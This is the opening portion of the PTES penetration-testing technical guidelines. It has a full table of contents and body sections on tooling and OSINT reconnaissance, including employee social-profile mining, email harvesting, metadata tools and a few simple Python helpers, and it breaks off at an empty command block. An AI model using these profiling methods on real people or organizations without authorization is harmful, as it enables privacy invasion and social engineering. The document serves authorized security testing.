PTES Technical Guidelines

This section is designed to be the PTES technical guidelines that help define certain procedures to follow during a penetration test. Something to be aware of is that these are only baseline methods that have been used in the industry. They will need to be continuously updated and changed by the community as well as within your own standard. Guidelines are just that: something to drive you in a direction and help during certain scenarios, but not an all-encompassing set of instructions on how to perform a penetration test. Think outside of the box.

Contents

1 Tools Required
1.1 Operating Systems
1.1.1 MacOS X
1.1.2 VMware Workstation
1.1.2.1 Linux
1.1.2.2 Windows XP/7
1.2 Radio Frequency Tools
1.2.1 Frequency Counter
1.2.2 Frequency Scanner
1.2.3 Spectrum Analyzer
1.2.4 802.11 USB adapter
1.2.5 External Antennas
1.2.6 USB GPS
1.3 Software
2 Intelligence Gathering
2.1 OSINT
2.1.1 Corporate
2.1.2 Physical
2.1.2.1 Locations
2.1.2.2 Shared/Individual
2.1.2.3 Owner
2.1.2.3.1 Land/tax records
2.1.3 Datacenter Locations
2.1.3.1 Time zones
2.1.3.2 Offsite gathering
2.1.3.3 Product/Services
2.1.3.4 Company Dates
2.1.3.5 Position identification
2.1.3.6 Organizational Chart
2.1.3.7 Corporate Communications
2.1.3.7.1 Marketing
2.1.3.7.2 Lawsuits
2.1.3.7.3 Transactions
2.1.3.8 Job openings
2.1.4 Relationships
2.1.4.1 Charity Affiliations
2.1.4.2 Network Providers
2.1.4.3 Business Partners
2.1.4.4 Competitors
2.2 Individuals
2.2.1 Social Networking Profile
2.2.2 Social Networking Websites
2.2.3 Cree.py
2.3 Internet Footprint
2.3.1 Email addresses
2.3.1.1 Maltego
2.3.1.2 TheHarvester
2.3.1.3 NetGlub
2.3.2 Usernames/Handles
2.3.3 Social Networks
2.3.3.1 Newsgroups
2.3.3.2 Mailing Lists
2.3.3.3 Chat Rooms
2.3.3.4 Forums Search
2.3.4 Personal Domain Names
2.3.5 Personal Activities
2.3.5.1 Audio
2.3.5.2 Video
2.3.6 Archived Information
2.3.7 Electronic Data
2.3.7.1 Document leakage
2.3.7.2 Metadata leakage
2.3.7.2.1 FOCA (Windows)
2.3.7.2.2 Foundstone SiteDigger (Windows)
2.3.7.2.3 Metagoofil (Linux/Windows)
2.3.7.2.4 Exif Reader (Windows)
2.3.7.2.5 ExifTool (Windows/OS X)
2.3.7.2.6 Image Search
2.4 Covert gathering
2.4.1 On-location gathering
2.4.1.1 Adjacent Facilities
2.4.1.2 Physical security inspections
2.4.1.2.1 Security guards
2.4.1.2.2 Badge Usage
2.4.1.2.3 Locking devices
2.4.1.2.4 Intrusion detection systems (IDS)/Alarms
2.4.1.2.5 Security lighting
2.4.1.2.6 Surveillance/CCTV systems
2.4.1.2.7 Access control devices
2.4.1.2.8 Environmental Design
2.4.1.3 Employee Behavior
2.4.1.4 Dumpster diving
2.4.1.5 RF / Wireless Frequency scanning
2.4.2 Frequency Usage
2.4.3 Equipment Identification
2.4.3.1 Airmon-ng
2.4.3.2 Airodump-ng
2.4.3.3 Kismet-Newcore
2.4.3.4 inSSIDer
2.5 External Footprinting
2.5.1 Identifying IP Ranges
2.5.1.1 WHOIS lookup
2.5.1.2 BGP looking glasses
2.5.2 Active Reconnaissance
2.5.3 Passive Reconnaissance
2.5.4 Active Footprinting
2.5.4.1 Zone Transfers
2.5.4.1.1 Host
2.5.4.1.2 Dig
2.5.4.2 Reverse DNS
2.5.4.3 DNS Bruting
2.5.4.3.1 Fierce2 (Linux)
2.5.4.3.2 DNSEnum (Linux)
2.5.4.3.3 Dnsdict6 (Linux)
2.5.4.4 Port Scanning
2.5.4.4.1 Nmap (Windows/Linux)
2.5.4.5 SNMP Sweeps
2.5.4.5.1 SNMPEnum (Linux)
2.5.4.6 SMTP Bounce Back
2.5.4.7 Banner Grabbing
2.5.4.7.1 HTTP
2.6 Internal Footprinting
2.6.1 Active Footprinting
2.6.1.1 Ping Sweeps
2.6.1.1.1 Nmap (Windows/Linux)
2.6.1.1.2 Alive6 (Linux)
2.6.1.2 Port Scanning
2.6.1.2.1 Nmap (Windows/Linux)
2.6.1.3 SNMP Sweeps
2.6.1.3.1 SNMPEnum (Linux)
2.6.1.4 Metasploit
2.6.1.5 Zone Transfers
2.6.1.5.1 Host
2.6.1.5.2 Dig
2.6.1.6 SMTP Bounce Back
2.6.1.7 Reverse DNS
2.6.1.8 Banner Grabbing
2.6.1.8.1 HTTP
2.6.1.8.2 httprint
2.6.1.9 VoIP mapping
2.6.1.9.1 Extensions
2.6.1.9.2 Svwar
2.6.1.9.3 enumIAX
2.6.1.10 Passive Reconnaissance
2.6.1.10.1 Packet Sniffing
3 Vulnerability Analysis
3.1 Vulnerability Testing
3.1.1 Active
3.1.2 Automated Tools
3.1.2.1 Network/General Vulnerability Scanners
3.1.2.2 Open Vulnerability Assessment System (OpenVAS) (Linux)
3.1.2.3 Nessus (Windows/Linux)
3.1.2.4 NeXpose
3.1.2.5 eEYE Retina
3.1.2.6 Qualys
3.1.2.7 Core IMPACT
3.1.2.7.1 Core IMPACT Web
3.1.2.7.2 Core IMPACT WiFi
3.1.2.7.3 Core IMPACT Client Side
3.1.2.7.4 Core Web
3.1.2.7.5 coreWEBcrawl
3.1.2.7.6 Core Onestep Web RPTs
3.1.2.7.7 Core WiFi
3.1.2.8 SAINT
3.1.2.8.1 SAINTscanner
3.1.2.8.2 SAINTexploit
3.1.2.8.3 SAINTwriter
3.1.3 Web Application Scanners
3.1.3.1 General Web Application Scanners
3.1.3.1.1 WebInspect (Windows)
3.1.3.1.2 IBM AppScan
3.1.3.1.3 Web Directory Listing/Bruteforcing
3.1.3.1.4 Webserver Version/Vulnerability Identification
3.1.3.2 NetSparker (Windows)
3.1.3.3 Specialized Vulnerability Scanners
3.1.3.3.1 Virtual Private Networking (VPN)
3.1.3.3.2 IPv6
3.1.3.3.3 War Dialing
3.1.4 Passive Testing
3.1.4.1 Automated Tools
3.1.4.1.1 Traffic Monitoring
3.1.4.2 Wireshark
3.1.4.3 Tcpdump
3.1.4.4 Metasploit Scanners
3.1.4.4.1 Metasploit Unleashed
3.2 Vulnerability Validation
3.2.1 Public Research
3.2.1.1 Common/default passwords
3.2.2 Establish target list
3.2.2.1 Mapping Versions
3.2.2.2 Identifying Patch Levels
3.2.2.3 Looking for Weak Web Applications
3.2.2.4 Identify Weak Ports and Services
3.2.2.5 Identify Lockout threshold
3.3 Attack Avenues
3.3.1 Creation of Attack Trees
3.3.2 Identify protection mechanisms
3.3.2.1 Network protections
3.3.2.1.1 “Simple” Packet Filters
3.3.2.1.2 Traffic shaping devices
3.3.2.1.3 Data Loss Prevention (DLP) systems
3.3.2.2 Host based protections
3.3.2.2.1 Stack/heap protections
3.3.2.2.2 Whitelisting
3.3.2.2.3 AV/Filtering/Behavioral Analysis
3.3.2.3 Application level protections
4 Exploitation
4.1 Precision strike
4.1.1 Countermeasure Bypass
4.1.1.1 AV
4.1.1.2 Human
4.1.1.3 HIPS
4.1.1.4 DEP
4.1.1.5 ASLR
4.1.1.6 VA + NX (Linux)
4.1.1.7 w^x (OpenBSD)
4.1.1.8 WAF
4.1.1.9 Stack Canaries
4.1.1.9.1 Microsoft Windows
4.1.1.9.2 Linux
4.1.1.9.3 MAC OS
4.2 Customized Exploitation
4.2.1 Fuzzing
4.2.2 Dumb Fuzzing
4.2.3 Intelligent Fuzzing
4.2.4 Sniffing
4.2.4.1 Wireshark
4.2.4.2 Tcpdump
4.2.5 Brute-Force
4.2.5.1 Brutus (Windows)
4.2.5.2 Web Brute (Windows)
4.2.5.3 THC-Hydra/XHydra
4.2.5.4 Medusa
4.2.5.5 Ncrack
4.2.6 Routing protocols
4.2.7 Cisco Discovery Protocol (CDP)
4.2.8 Hot Standby Router Protocol (HSRP)
4.2.9 Virtual Switch Redundancy Protocol (VSRP)
4.2.10 Dynamic Trunking Protocol (DTP)
4.2.11 Spanning Tree Protocol (STP)
4.2.12 Open Shortest Path First (OSPF)
4.2.13 RIP
4.2.14 VLAN Hopping
4.2.15 VLAN Trunking Protocol (VTP)
4.3 RF Access
4.3.1 Unencrypted Wireless LAN
4.3.1.1 Iwconfig (Linux)
4.3.1.2 Windows (XP/7)
4.3.2 Attacking the Access Point
4.3.2.1 Denial of Service (DoS)
4.3.3 Cracking Passwords
4.3.3.1 WPA-PSK/WPA2-PSK
4.3.3.2 WPA/WPA2-Enterprise
4.3.4 Attacks
4.3.4.1 LEAP
4.3.4.1.1 Asleap
4.3.4.2 802.1X
4.3.4.2.1 Key Distribution Attack
4.3.4.2.2 RADIUS Impersonation Attack
4.3.4.3 PEAP
4.3.4.3.1 RADIUS Impersonation Attack
4.3.4.3.2 Authentication Attack
4.3.4.4 EAP-Fast
4.3.4.5 WEP/WPA/WPA2
4.3.4.6 Aircrack-ng
4.4 Attacking the User
4.4.1 Karmetasploit Attacks
4.4.2 DNS Requests
4.4.3 Bluetooth
4.4.4 Personalized Rogue AP
4.4.5 Web
4.4.5.1 SQL Injection (SQLi)
4.4.5.2 XSS
4.4.5.3 CSRF
4.4.6 Ad-Hoc Networks
4.4.7 Detection bypass
4.4.8 Resistance of Controls to attacks
4.4.9 Type of Attack
4.4.10 The Social-Engineer Toolkit
4.5 VPN detection
4.6 Route detection, including static routes
4.6.1 Network Protocols in use
4.6.2 Proxies in use
4.6.3 Network layout
4.6.4 High value/profile targets
4.7 Pillaging
4.7.1 Video Cameras
4.7.2 Data Exfiltration
4.7.3 Locating Shares
4.7.4 Audio Capture
4.7.5 High Value Files
4.7.6 Database Enumeration
4.7.7 Wifi
4.7.8 Source Code Repos
4.7.9 Git
4.7.10 Identify custom apps
4.7.11 Backups
4.8 Business impact attacks
4.9 Further penetration into infrastructure
4.9.1 Pivoting inside
4.9.1.1 History/Logs
4.9.2 Cleanup
4.10 Persistence
5 Post Exploitation
5.1 Windows Post Exploitation
5.1.1 Blind Files
5.1.2 Non Interactive Command Execution
5.1.3 System
5.1.4 Networking (ipconfig, netstat, net)
5.1.5 Configs
5.1.6 Finding Important Files
5.1.7 Files To Pull (if possible)
5.1.8 Remote System Access
5.1.9 Auto-Start Directories
5.1.10 Binary Planting
5.1.11 Deleting Logs
5.1.12 Uninstalling Software “AntiVirus” (Non interactive)
5.1.13 Other
5.1.13.1 Operating Specific
5.1.13.1.1 Win2k3
5.1.13.1.2 Vista/7
5.1.13.1.3 Vista SP1/7/2008/2008R2 (x86 & x64)
5.1.14 Invasive or Altering Commands
5.1.15 Support Tools Binaries / Links / Usage
5.1.15.1 Various tools
5.2 Obtaining Password Hashes in Windows
5.2.1 LSASS Injection
5.2.1.1 Pwdump6 and Fgdump
5.2.1.2 Hashdump in Meterpreter
5.2.2 Extracting Passwords from Registry
5.2.2.1 Copy from the Registry
5.2.2.2 Extracting the Hashes
5.2.3 Extracting Passwords from Registry using Meterpreter
6 Reporting
6.1 Executive-Level Reporting
6.2 Technical Reporting
6.3 Quantifying the risk
6.4 Deliverable
7 Custom tools developed
8 Appendix A – Creating OpenVAS “Only Safe Checks” Policy
8.1 General
8.2 Plugins
8.3 Credentials
8.4 Target Selection
8.5 Access Rules
8.6 Preferences
8.7 Knowledge Base
9 Appendix B – Creating the “Only Safe Checks” Policy
9.1 General
9.2 Credentials
9.3 Plugins
9.4 Preferences
10 Appendix C – Creating the “Only Safe Checks (Web)” Policy
10.1 General
10.2 Credentials
10.3 Plugins
10.4 Preferences
11 Appendix D – Creating the “Validation Scan” Policy
11.1 General
11.2 Credentials
11.3 Plugins
11.4 Preferences
12 Appendix E – NeXpose Default Templates
12.1 Denial of service
12.2 Discovery scan
12.3 Discovery scan (aggressive)
12.4 Exhaustive
12.5 Full audit
12.6 HIPAA compliance
12.7 Internet DMZ audit
12.8 Linux RPMs
12.9 Microsoft hotfix
12.10 Payment Card Industry (PCI) audit
12.11 Penetration test
12.12 Penetration test
12.13 Safe network audit
12.14 Sarbanes-Oxley (SOX) compliance
12.15 SCADA audit
12.16 Web audit

Tools Required

Selecting the tools required during a penetration test depends on several factors such as the type and the depth of the engagement. In general terms, the following tools are mandatory to complete a penetration test with the expected results.

Operating Systems

Selecting the operating platforms to use during a penetration test is often critical to the successful exploitation of a network and its associated systems. As such, it is a requirement to be able to use all three major operating systems at one time. This is not possible without virtualization.

MacOS X

MacOS X is a BSD-derived operating system. With standard command shells (such as sh, csh, and bash) and native network utilities that can be used during a penetration test (including telnet, ftp, rpcinfo, snmpwalk, host, and dig), it is the system of choice and is the underlying host system for our penetration testing tools. Since this is a hardware platform as well, this makes the selection of specific hardware extremely simple and ensures that all tools will work as designed.

VMware Workstation

VMware Workstation is an absolute requirement to allow multiple operating system instances to run easily on a workstation. VMware Workstation is a fully supported commercial package, and offers encryption and snapshot capabilities that are not available in the free versions available from VMware. Without the ability to encrypt the data collected on a VM, confidential information will be at risk; therefore, versions that do not support encryption are not to be used. The operating systems listed below should be run as guest systems within VMware.

Linux

Linux is the choice of most security consultants. The Linux platform is versatile, and the system kernel provides low-level support for leading-edge technologies and protocols. All mainstream IP-based attack and penetration tools can be built and run under Linux with no problems. For this reason, BackTrack is the platform of choice as it comes with all the tools required to perform a penetration test.

Windows XP/7

Windows XP/7 is required for certain tools to be used. Many commercial and Microsoft-specific network assessment and penetration tools are available that run cleanly on this platform.

Radio Frequency Tools

Frequency Counter

A frequency counter should cover 10 Hz to 3 GHz. A good example of a reasonably priced frequency counter is the MFJ-886 Frequency Counter.

Frequency Scanner

A scanner is a radio receiver that can automatically tune, or scan, two or more discrete frequencies, stopping when it finds a signal on one of them and then continuing to scan other frequencies when the initial transmission ceases. These are not to be used in Florida, Kentucky, or Minnesota unless you are a person who holds a current amateur radio license issued by the Federal Communications Commission. The required hardware is the Uniden BCD396T Bearcat Handheld Digital Scanner or PSR-800 GRE Digital trunking scanner.

Spectrum Analyzer

A spectrum analyzer is a device used to examine the spectral composition of some electrical, acoustic, or optical waveform. A spectrum analyzer is used to determine whether or not a wireless transmitter is working according to federally defined standards and is used to determine, by direct observation, the bandwidth of a digital or analog signal. A good example of a reasonably priced spectrum analyzer is the Kaltman Creations HF4060 RF Spectrum Analyzer.

802.11 USB adapter

An 802.11 USB adapter allows for the easy connection of a wireless adapter to the penetration testing system. There are several issues with using something other than the approved USB adapter, as not all of them support the required functions. The required hardware is the Alfa AWUS051NH 500mW High Gain 802.11a/b/g/n high power Wireless USB adapter.

External Antennas

External antennas come in a variety of shapes and with a variety of connectors, based upon their usage. All external antennas must have RP-SMA connectors that are compatible with the Alfa. Since the Alfa comes with an omni-directional antenna, we need to obtain a directional antenna. The best choice is a panel antenna, as it provides the required capabilities in a package that travels well. The required hardware is the L-com 2.4 GHz 14 dBi Flat Panel Antenna with RP-SMA connector. A magnetic mount omni-directional antenna such as the L-com 2.4 GHz/900 MHz 3 dBi Omni Magnetic Mount Antenna with RP-SMA Plug Connector is also a good choice.

USB GPS

A GPS is a necessity to properly perform an RF assessment. Without one it is simply impossible to determine where and how far RF signals are propagating. Numerous options are available, so you should obtain a USB GPS that is supported on the operating system you are using, be that Linux, Windows, or Mac OS X.

Software

The software requirements are based upon the engagement scope; however, we’ve listed some commercial and open source software that could be required to properly conduct a full penetration test.

Intelligence Gathering

Intelligence Gathering is the phase where data or “intelligence” is gathered to assist in guiding the assessment actions. At the broadest level this intelligence gathering includes information about employees, facilities, products and plans. Within a larger picture this intelligence will include potentially secret or private “intelligence” of a competitor, or information that is otherwise relevant to the target.

OSINT

Open Source Intelligence (OSINT), in the simplest of terms, is locating and analyzing publicly available (open) sources of information. The key component here is that this intelligence gathering process has a goal of producing current and relevant information that is valuable to either an attacker or competitor. For the most part, OSINT is more than simply performing web searches using various sources.

Corporate

Information on a particular target should include information regarding the legal entity. Most states within the US require corporations, limited liability companies, and limited partnerships to file with the state division. This division serves as custodian of the filings and maintains copies and/or certifications of the documents and filings. These filings may contain information regarding shareholders, members, officers, or other persons involved in the target entity.

Physical

Often the first step in OSINT is to identify the physical locations of the target corporation. This information might be readily available for publicly known or published locations, but not quite so easy for more secretive sites. Public sites can often be located by using search engines such as:

Google -http://www.google.com

Yahoo – http://yahoo.com

Bing – http://www.bing.com

Ask.com – http://ask.com
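As a sketch of how queries against these engines can be assembled consistently, the helper below builds a handful of targeted search strings for a company name. The operators and the "Example Corp" name are illustrative assumptions, not PTES-mandated queries; adjust them per engine syntax and target.

```python
# Sketch: build targeted search-engine queries for locating a target's
# published physical sites. Operators and company name are illustrative.

def location_queries(company: str) -> list:
    """Return search strings useful for finding published office locations."""
    return [
        f'"{company}" headquarters address',
        f'"{company}" "office locations"',
        f'"{company}" site:linkedin.com/company',   # staff-listed locations
        f'"{company}" filetype:pdf "annual report"',  # filings often list sites
    ]

for q in location_queries("Example Corp"):
    print(q)
```

Recording the exact queries used keeps the OSINT phase repeatable and auditable later in the engagement.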

Locations

Shared/Individual

As part of identifying the physical location it is important to note if the location is an individual building or simply a suite in a larger facility. It is important to attempt to identify neighboring businesses as well as common areas.

Owner

Once the physical locations have been identified, it is useful to identify the actual property owner(s). This can either be an individual, group, or corporation. If the target corporation does not own the property then they may be limited in what they can physically do to enhance or improve the physical location.

Land/tax records

Tax records:

Land and tax records generally include a wealth of information on a target such as ownership, possession, mortgage companies, foreclosure notices, photographs and more. The information recorded and level of transparency varies greatly by jurisdiction. Land and tax records within the United States are typically handled at the county level.

Building department:

The building department generally has floor plans, old and current permits, tenant improvement information, and other similar information on file. Buried in that information might be the names of contracting firms, engineers, architects, and more, all of which could be used with a tool such as SET. In most cases, a phone call will be required to obtain any of this information, but most building departments are happy to hand it out to anyone who asks.

Datacenter Locations

Identifying any target business data center locations via either the corporate website, public filings, land records or via a search engine can provide additional potential targets.

Time zones

Identifying the time zones that the target operates in provides valuable information regarding the hours of operation. It is also significant to understand the relationship between the target time zone and that of the assessment team. A time zone map is often useful as a reference when conducting any test.
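To make the team/target time-zone relationship concrete, here is a minimal sketch that computes how many hours a 9:00–17:00 workday overlaps between two fixed UTC offsets. The offsets and workday bounds are assumptions to adjust per engagement; real engagements should also account for daylight saving rules.

```python
# Minimal sketch: daily working-hours overlap between the assessment team
# and the target. UTC offsets and the 9-17 workday are assumed inputs.

def overlap_hours(team_utc_offset: int, target_utc_offset: int,
                  start: int = 9, end: int = 17) -> int:
    """Hours per day when both parties are inside their local workday."""
    shift = target_utc_offset - team_utc_offset
    # Express the target's workday on the team's local clock.
    t_start, t_end = start - shift, end - shift
    return max(0, min(end, t_end) - max(start, t_start))

print(overlap_hours(-5, 0))  # team at UTC-5, target at UTC -> 3
```

A small calculation like this helps schedule testing windows that either coincide with, or deliberately avoid, the target's staffed hours.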

Offsite gathering

Identifying any recent or future offsite gatherings or parties via either the corporate website or via a search engine can provide valuable insight into the corporate culture of a target. It is often common practice for businesses to have offsite gatherings not only for employees, but also for business partners and customers. Collecting this data could provide insight into potential items of interest to an attacker.

Product/Services

Identifying the target business products and any significant data related to such launches via the corporate website, news releases, or a search engine can provide valuable insight into the internal workings of a target. It is often common practice for businesses to make such notifications publicly in an effort to garner publicity and to inform current and/or new customers of the launch. Publicly available information includes, but is not limited to, foreign language documents, radio and television broadcasts, Internet sites, and public speaking.

Company Dates

Significant company dates can provide insight into potential days where staff may be on higher alert than normal. This could be due to corporate meetings, board meetings, investor meetings, or corporate anniversaries. Normally, businesses that observe various holidays have a significantly reduced staff, and therefore targeting may prove to be much more difficult during these periods.

Position identification

Within every target it is critical that you identify and document the top positions within the organization. This is critical to ensure that the resulting report is targeting the correct audience. At a minimum, key employees should be identified as part of any engagement.

Organizational Chart

Understanding the organizational structure is important, not only to understand the depth of the structure, but also the breadth. If the organization is extremely large, it is possible that new staff or personnel could go undetected. In smaller organizations, the likelihood is not as great. Getting a good picture of this structure can also provide insight into the functional groups. This information can be useful in determining internal targets.

Corporate Communications

Identifying corporate communications either via the corporate website or a job search engine can provide valuable insight into the internal workings of a target.

Marketing

Marketing communications are often used to make corporate announcements regarding current or future product releases and partnerships.

Lawsuits

Communications regarding the target’s involvement in litigation can provide insight into potential threat agents or data of interest.

Transactions

Communications involving corporate transactions may be an indirect response to a marketing announcement or lawsuit.

Job openings

Searching current job openings or postings via either the corporate website or a job search engine can provide valuable insight into the internal workings of a target. It is often common practice to include information regarding current, or future, technology implementations. Collecting this data could provide insight into potential items of interest to an attacker. Several job search engines exist that can be queried for information regarding the target.

Relationships

Identifying the target’s logical relationships is critical to understanding more about how the business operates. Publicly available information should be leveraged to determine the target’s business relationships with vendors, business partners, law firms, etc. This is often available via news releases, corporate web sites (target and vendors), and potentially via industry-related forums.

Charity Affiliations

Identifying any target business charity affiliations via either the corporate website or via a search engine can provide valuable insight into the internal workings and potentially the corporate culture of a target. It is often common practice for businesses to make charitable donations to various organizations. Collecting this data could provide insight into potential items of interest to an attacker.

Network Providers

Identifying any network provisioning or providers, either via the allocated netblock/address information, the corporate website, or a search engine, can provide valuable insight into the connectivity and technologies of a target. Collecting this data could provide insight into potential items of interest to an attacker.

Business Partners

Identifying business partners is critical to gaining insight into not only the corporate culture of a target, but also potentially technologies being used. It is often common practice for businesses to announce partnership agreements. Collecting this data could provide insight into potential items of interest to an attacker.

Competitors

Identifying competitors can provide a window into potential adversaries. It is not uncommon for competitors to announce news that could impact the target. These could range from new hires, product launches, and even partnership agreements. Collecting this data is important to fully understand any potential corporate hostility.

Individuals

Social Networking Profile

The number of active social networking websites, as well as the number of their users, makes them a prime location to identify employees’ friendships, kinships, common interests, financial exchanges, likes/dislikes, sexual relationships, or beliefs. It is even possible to determine an employee’s corporate knowledge or prestige.

Social Networking Websites

Tone and Frequency

Location awareness

Cree.py

Cree.py is a beta tool that is used to automate the task of information gathering from Twitter as well as FourSquare. In addition, Cree.py can gather any geolocation data from flickr, twitpic.com, yfrog.com, img.ly, plixi.com, twitrpix.com, foleext.com, shozu.com, pickhur.com, moby.to, twitsnaps.com and twitgoo.com. Cree.py is an open source intelligence gathering application. To install Cree.py, you will need to add a repository to your /etc/apt/sources.list.

Update package list

Install creepy

Cree.py Interface


Internet Footprint

Internet footprinting is where we attempt to gather externally available information about the target infrastructure that can be leveraged in later phases.

Email addresses

Gathering email addresses, while seemingly useless, can provide us with valuable information about the target environment. It can reveal potential naming conventions as well as potential targets for later use. There are many tools that can be used to gather email addresses, Maltego for example.
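As a rough illustration of what these harvesting tools automate, the sketch below extracts addresses for a given domain from page content you have already retrieved. The regex and the sample page text are illustrative assumptions, not the implementation of any particular tool.

```python
# Sketch: pull candidate e-mail addresses for a target domain out of
# already-retrieved text (a crude stand-in for automated harvesters).
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def harvest_emails(text: str, domain: str) -> set:
    """Return addresses in `text` belonging to `domain`, case-normalized."""
    found = {m.group(0).lower() for m in EMAIL_RE.finditer(text)}
    return {e for e in found if e.endswith("@" + domain.lower())}

page = "Contact j.smith@Example.com or press@example.com; spam@other.org"
print(sorted(harvest_emails(page, "example.com")))
```

Even a handful of harvested addresses often exposes the naming convention (first initial plus surname, for instance) mentioned above.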

Maltego

Paterva Maltego is used to automate the task of information gathering. Maltego is an open source intelligence and forensics application. Essentially, Maltego is a data mining and information-gathering tool that maps the information gathered into a format that is easily understood and manipulated. It saves you time by automating tasks such as email harvesting and mapping subdomains. The documentation of Maltego is relatively sparse so we are including the procedures necessary to obtain the data required.


To start, look to the very upper left-hand corner of Maltego and click the “new graph” button. After that, drag the “domain” item out of the palette onto the graph. The graph area allows you to process the transforms as well as view the data in the mining view, dynamic view, edge weighted view, or the entity list. When you first add the domain icon to your graph, it will default to “paterva.com”; double-click on that icon and change the name to your target’s domain (without any subdomain such as www). Now you are ready to start mining.

After this point, you should be able to use your imagination as to where to go next. You will be able to cultivate phone numbers, email addresses, geo location information and much more by using the transforms provided. The Palette contains all the transforms that are available (or activated) for use. As of this writing, there are approximately 72 transforms. One limitation of the “Community Edition” of Maltego is that any given transform will only return 12 results whereas the professional version doesn’t have any limitations.

Maltego is not just limited to the pre-engagement portion of your pentest. You can also import csv/xls dumps of your airodump results back into Maltego to help you visualize the networks.

TheHarvester

TheHarvester is a tool, written by Christian Martorella, that can be used to gather e-mail accounts and subdomain names from different public sources (search engines, PGP key servers). It is a really simple tool, but very effective.

TheHarvester will search the specified data source and return the results. This should be added to the OSINT document for use at a later stage.

NetGlub

NetGlub is an open source tool that is very similar to Maltego. NetGlub is a data mining and information-gathering tool that presents the information gathered in a format that is easily understood. The documentation of NetGlub is nonexistent at the moment so we are including the procedures necessary to obtain the data required.

At this point we’re going to use a GUI installation of the QT-SDK. The main thing to point out here is that the installation path needs to be changed during the installation to reflect /opt/qtsdk. If you use a different path, then you will need to update the paths in the script below to reflect that difference.

Now we need to start MySQL and create the netglub database

Once you have installed NetGlub, you’ll probably be interested in running it. This is really a four-step process.

Ensure that MySQL is running:

Start the NetGlub Master:

Start the NetGlub Slave:

Start the NetGlub GUI:

Now the main interface should be visible. If you are familiar with Maltego, then you will feel right at home with the interface. The six main areas of the interface are the toolbar, the Palette, the graph (or view) area, the overview, the details, and the property area.

The Palette contains a complete list of all the transforms that are available (or activated) for use. As of this writing, there are approximately 33 transforms. A transform is a script that will actually perform the action against a given site.

The graph area allows you to process the transforms as well as view the data in the mining view, dynamic view, edge weighted view, or the entity list. The overview area provides a mini-map of the entities discovered based upon the transforms. The detail area is where it is possible to drill into the specifics of the entity, such as its relationships and details of how the information was generated. The property area allows you to see the specific properties of the transform populated with the results specific to the entity. To begin using NetGlub, we need to drag and drop a transform from the Palette to the graph area. By default, this will be populated with dummy data. To edit the entity within the selected transform, edit the entries within the property view.

The data from these entities will be used to obtain additional information. The results will then be visible within the graph area.

By selecting the entities and choosing to run additional transforms, the data collected will expand. If a particular transform that you want to collect data from has not been used, simply drag it to the graph area and make the appropriate changes within the property view.

For Alchemy, you will need to go to http://www.alchemyapi.com/api/register.html to receive your own API key. For OpenCalais, you will need to go to http://www.opencalais.com/APIkey to receive your own API key.

Usernames/Handles

Identifying usernames and handles that are associated with a particular email is useful, as this might provide several key pieces of information. For instance, it could provide a significant clue for usernames and passwords. In addition, it can also indicate a particular individual’s interests outside of work. A good place to locate this type of information is within discussion groups (newsgroups, mailing lists, forums, chat rooms, etc.).

Social Networks

Check Usernames – Useful for checking the existence of a given username across 160 Social Networks.
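A simple way to operationalize this kind of check is to expand a discovered handle into candidate profile URLs for manual (or scripted) verification. The four sites below are illustrative assumptions, nowhere near the 160 networks a service like Check Usernames covers.

```python
# Sketch: expand a discovered handle into candidate profile URLs to check.
# The site list is illustrative, not exhaustive.

SITES = {
    "Twitter":  "https://twitter.com/{}",
    "GitHub":   "https://github.com/{}",
    "Reddit":   "https://www.reddit.com/user/{}",
    "Facebook": "https://www.facebook.com/{}",
}

def profile_urls(handle: str) -> dict:
    """Map each site name to the candidate profile URL for `handle`."""
    return {site: url.format(handle) for site, url in SITES.items()}

for site, url in profile_urls("jdoe").items():
    print(f"{site}: {url}")
```

Checking each URL's existence (and noting which handles resolve) helps correlate a single individual across networks.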

Newsgroups

Google – http://www.google.com

Yahoo Groups – http://groups.yahoo.com

Delphi Forums – http://www.delphiforums.com

Big Boards – http://www.big-boards.com

Mailing Lists

TILE.Net – http://tile.net/lists

Topica – http://lists.topica.com

L-Soft CataList, the Official Catalog of LISTSERV lists – http://www.lsoft.com/lists/listref.html

The Mail Archive – http://www.mail-archive.com

Chat Rooms

SearchIRC – http://searchirc.com

Gogloom – http://www.gogloom.com

Forums Search

BoardReader – http://boardreader.com

Omgili – http://www.omgili.com

Personal Domain Names

The ability to locate personal domains that belong to target employees can yield additional information such as potential usernames and passwords. In addition, it can also indicate a particular individual’s interest outside of work.

Personal Activities

It is not uncommon for individuals to create and publish audio files and videos. While these may seem insignificant, they can yield additional information about a particular individual’s interests outside of work.

Audio

iTunes – http://www.apple.com/itunes

Podcast.com – http://podcast.com

Podcast Directory – http://www.podcastdirectory.com

Yahoo! Audio Search – http://audio.search.yahoo.com

Video

YouTube – http://youtube.com

Yahoo Video – http://video.search.yahoo.com

Google Video – http://video.google.com

Bing Video – http://www.bing.com/videos

Archived Information

There are times when we will be unable to access website information because the content is no longer available from the original source. Being able to access archived copies of this information allows access to past information. There are several ways to access this archived information; the primary means is to utilize Google's cached results. As part of an NVA, it is not uncommon to perform Google searches using specially targeted search strings: cache:<site.com>

An additional resource for archived information is the Wayback Machine (http://www.archive.org).

Electronic Data

Collection of electronic data in direct response to reconnaissance and intelligence gathering should be focused on the target business or individual.

Document leakage

Publicly available documents should be gathered for essential data (date, time, location specific information, language, and author). Data collected could provide insight into the current environment, operational procedures, employee training, and human resources.

Metadata leakage

Identifying metadata is possible using specialized search engines. The goal is to identify data that is relevant to the target corporation. It may be possible to identify locations, hardware, software, and other relevant data from social networking posts. Some search engines that provide the ability to search for metadata are as follows:

ixquick – http://ixquick.com

MetaCrawler – http://metacrawler.com

Dogpile – http://www.dogpile.com

Search.com – http://www.search.com

Jeffrey's Exif Viewer – http://regex.info/exif.cgi

In addition to search engines, several tools exist to collect files and gather information from various documents.

FOCA (Windows)

FOCA is a tool that reads metadata from a wide range of document and media formats. FOCA pulls out relevant usernames, paths, software versions, printer details, and email addresses. This can all be performed without the need to individually download files.

Foundstone SiteDigger (Windows)

Foundstone has a tool, named SiteDigger, which allows us to search a domain using specialized search strings from both the Google Hacking Database (GHDB) and Foundstone Database (FSDB). This allows for slightly over 1640 potential queries available to discover additional information.

Metagoofil (Linux/Windows)

Metagoofil is a Linux based information gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .odp, .ods) available on the client’s websites.

Metagoofil has a few options available, but most are related to what specifically you want to target as well as the number of results desired.

The command to run metagoofil is as follows:
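A representative invocation might look like the following. The domain, file types, limits, and output names here are illustrative only; adjust them to the authorized target and check the installed version's help output, as option names have varied between releases.

```shell
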